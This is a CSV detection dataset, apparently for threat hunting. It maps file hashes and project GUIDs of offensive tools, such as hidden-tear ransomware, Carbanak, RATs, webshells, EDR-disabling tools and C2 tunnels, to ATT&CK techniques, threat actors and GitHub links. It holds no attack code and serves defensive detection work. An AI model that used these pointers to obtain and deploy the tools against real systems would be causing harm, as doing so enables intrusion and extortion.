"*07dd043bc4e5ef2651ac9a1b4e5b849ce2e3dd6e3ca593a48625b568cfff924b*",".{0,1000}07dd043bc4e5ef2651ac9a1b4e5b849ce2e3dd6e3ca593a48625b568cfff924b.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","21216"
"*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*",".{0,1000}07DFC5AA\-5B1F\-4CCC\-A3D3\-816ECCBB6CB6.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","#GUIDproject","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","21217"
"*07e05292767dac077c0314535d073a90f742f25456880b2bf5311c4cf8169b91*",".{0,1000}07e05292767dac077c0314535d073a90f742f25456880b2bf5311c4cf8169b91.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21218"
"*07e5db0b397c217cb4d5bcee82d68065beecf390f30f223aeb857f231ca1e5fd*",".{0,1000}07e5db0b397c217cb4d5bcee82d68065beecf390f30f223aeb857f231ca1e5fd.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21220"
"*07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956*",".{0,1000}07e797c5274603d550b84df6cd3300d7ce9dc9903237b7f11b66821655712956.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21221"
"*07ec4fa926a9f4a90971f5bf78948fe4da7c6c4fc7c30d155d3c69c86258dcac*",".{0,1000}07ec4fa926a9f4a90971f5bf78948fe4da7c6c4fc7c30d155d3c69c86258dcac.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21223"
"*07EF7652-1C2D-478B-BB4B-F9560695A387*",".{0,1000}07EF7652\-1C2D\-478B\-BB4B\-F9560695A387.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#GUIDproject","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","21224"
"*07f1a35a2a86c46c5b0f70176aaacd6268b3dbf639d77bcf1b89235e8b44f327*",".{0,1000}07f1a35a2a86c46c5b0f70176aaacd6268b3dbf639d77bcf1b89235e8b44f327.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","21226"
"*07f9947795d25159d1df8ef1a6fcef3f17f96b659f31137a6f48eeaa061d3731*",".{0,1000}07f9947795d25159d1df8ef1a6fcef3f17f96b659f31137a6f48eeaa061d3731.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21229"
"*07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac*",".{0,1000}07fd00d4ecb5a197dec04d8ea359227ec5b6616f67034dda1f5da8824df91cac.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21230"
"*0800C357553BD74B42A5DD8A7C80C59422BFBC23F3E3F81CF0B16DEF66D4A70F*",".{0,1000}0800C357553BD74B42A5DD8A7C80C59422BFBC23F3E3F81CF0B16DEF66D4A70F.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21231"
"*08023b564648a07a5a37d7b4668f60616aeb3766a34be65130d722f46b9dd7aa*",".{0,1000}08023b564648a07a5a37d7b4668f60616aeb3766a34be65130d722f46b9dd7aa.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21232"
"*080A880D-BA94-4CF8-9015-5B2063073E02*",".{0,1000}080A880D\-BA94\-4CF8\-9015\-5B2063073E02.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","#GUIDproject","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","21234"
"*080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1*",".{0,1000}080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21235"
"*080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5*",".{0,1000}080c6108c3bd0f8a43d5647db36dc434032842339f0ba38ad1ff62f72999c4e5.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","#filehash","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","21236"
"*080de56a40e4ff15b0157da0224988a36f3e7c2347d58824ab3880f338d3eaec*",".{0,1000}080de56a40e4ff15b0157da0224988a36f3e7c2347d58824ab3880f338d3eaec.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","#filehash","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","21237"
"*08114a94779a336824a0c62c3d19622fb39aae355962d36a97ba1423a4d6bfcf*",".{0,1000}08114a94779a336824a0c62c3d19622fb39aae355962d36a97ba1423a4d6bfcf.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#filehash","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","21238"
"*0817eb1eeb9b25430a2666b8bd637d83e8c3c10ba14a8f6db0b0d3147ce3ab4a*",".{0,1000}0817eb1eeb9b25430a2666b8bd637d83e8c3c10ba14a8f6db0b0d3147ce3ab4a.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","21241"
"*0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9*",".{0,1000}0817f34dc2b4937f2ea352171e08852bf635b147f6bd77f1c9bdc2dde9f145b9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21242"
"*081a942df7cb4e74d01caf742178772aa5ec00905a6e546c5d80b5a495612bdf*",".{0,1000}081a942df7cb4e74d01caf742178772aa5ec00905a6e546c5d80b5a495612bdf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","21243"
"*082d22b44f305420b9ac577066effac3f01db0431671bef3667b6388082683b6*",".{0,1000}082d22b44f305420b9ac577066effac3f01db0431671bef3667b6388082683b6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21249"
"*082f932faefd33a4e3500c5cb8e119e09d5f914de6d18f16162b48bba15bb7d4*",".{0,1000}082f932faefd33a4e3500c5cb8e119e09d5f914de6d18f16162b48bba15bb7d4.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","21250"
"*08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157*",".{0,1000}08349c406f6b963930b5ad1ec36e2f5f3b42fb5e3bbd887fabb8ab039592e157.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21251"
"*08390cf5db68b7171650673f4214c9eee385d94c302c202a7de39d9fe0182796*",".{0,1000}08390cf5db68b7171650673f4214c9eee385d94c302c202a7de39d9fe0182796.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21253"
"*083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf*",".{0,1000}083c3acddf8e359225bdb42167294f87b16095eafe686dcfab41cd0e2d5e7ebf.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21254"
"*083dbfe9fbd1a94c640aa2e80c0304ac49d337b15f6f148c2f91d2c21a23cbb6*",".{0,1000}083dbfe9fbd1a94c640aa2e80c0304ac49d337b15f6f148c2f91d2c21a23cbb6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21256"
"*08422736c3ebf5b528cc404a39a20c8975d49758854115ee979ebff49282f5d9*",".{0,1000}08422736c3ebf5b528cc404a39a20c8975d49758854115ee979ebff49282f5d9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21257"
"*0845B3E9-B6AE-4227-B484-CECBC2EB1C87*",".{0,1000}0845B3E9\-B6AE\-4227\-B484\-CECBC2EB1C87.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","21258"
"*0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1*",".{0,1000}0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21263"
"*0866f16193a1944b2208ac9d22d3f629113eb968adcb8872b2659ec749c6f31a*",".{0,1000}0866f16193a1944b2208ac9d22d3f629113eb968adcb8872b2659ec749c6f31a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21266"
"*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*",".{0,1000}086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","21268"
"*086e623f343e09d81210818bf6d295f7eb12143e787d168973e16e29ea3a5942*",".{0,1000}086e623f343e09d81210818bf6d295f7eb12143e787d168973e16e29ea3a5942.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","21269"
"*086e7df92c7c6845243c26170b58c1bc173f79da123275abdf5ea07eb59c90a1*",".{0,1000}086e7df92c7c6845243c26170b58c1bc173f79da123275abdf5ea07eb59c90a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21270"
"*087c26613e0a27bccb09de333278fb55c2b9cf3cf7600e36615353e67c1baaf9*",".{0,1000}087c26613e0a27bccb09de333278fb55c2b9cf3cf7600e36615353e67c1baaf9.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","21273"
"*087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd*",".{0,1000}087fc2c7df1f06a75caf0a25c448736b649aba88d37f2179e01dca89e16a35fd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21275"
"*08809731dc3d878c71e0c6bfc5d27a78912aa67483533570da7bc475d22bd0ab*",".{0,1000}08809731dc3d878c71e0c6bfc5d27a78912aa67483533570da7bc475d22bd0ab.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21276"
"*088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4*",".{0,1000}088358bbd95bde68104156dc538c8c7d7e77e06dbd5887c6deefea79f48c2fa4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21277"
"*08854cc16c9fa4e9c61fccf8ae992e2645e59cb7e0c45d399775208f4aae60d5*",".{0,1000}08854cc16c9fa4e9c61fccf8ae992e2645e59cb7e0c45d399775208f4aae60d5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21278"
"*0888fa2d4be29e8820db387ceacaf7fb7a43e10d4e897ea0e7308674727584de*",".{0,1000}0888fa2d4be29e8820db387ceacaf7fb7a43e10d4e897ea0e7308674727584de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21279"
"*08896ffbae54cce89cdd8a4158ba8273a4d15c47f87cd8467c778a4000e0b152*",".{0,1000}08896ffbae54cce89cdd8a4158ba8273a4d15c47f87cd8467c778a4000e0b152.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","21280"
"*089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a*",".{0,1000}089b8bdbe138301d16cce615880632cd2b211b9f20b31d4748f88851bd13a79a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21281"
"*089CA7D6-3277-4998-86AF-F6413290A442*",".{0,1000}089CA7D6\-3277\-4998\-86AF\-F6413290A442.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#GUIDproject","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","21282"
"*089dd9652baa70862d00f465c81a5df3ab7129e82dca73edea36d0cfd8152b89*",".{0,1000}089dd9652baa70862d00f465c81a5df3ab7129e82dca73edea36d0cfd8152b89.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21283"
"*089e1f51fe8751dfbbc11c8ffd8d7b6121ac025d8e0c0c2f082e3d976d6af948*",".{0,1000}089e1f51fe8751dfbbc11c8ffd8d7b6121ac025d8e0c0c2f082e3d976d6af948.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","21284"
"*08a34b6f8df04ceec420e252fc484ac46a7f384a0c470e7abe4f1dc89762f067*",".{0,1000}08a34b6f8df04ceec420e252fc484ac46a7f384a0c470e7abe4f1dc89762f067.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21285"
"*08a715b0223935b1810024cb32618d84942aebbd10360407b571734ca93749db*",".{0,1000}08a715b0223935b1810024cb32618d84942aebbd10360407b571734ca93749db.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21286"
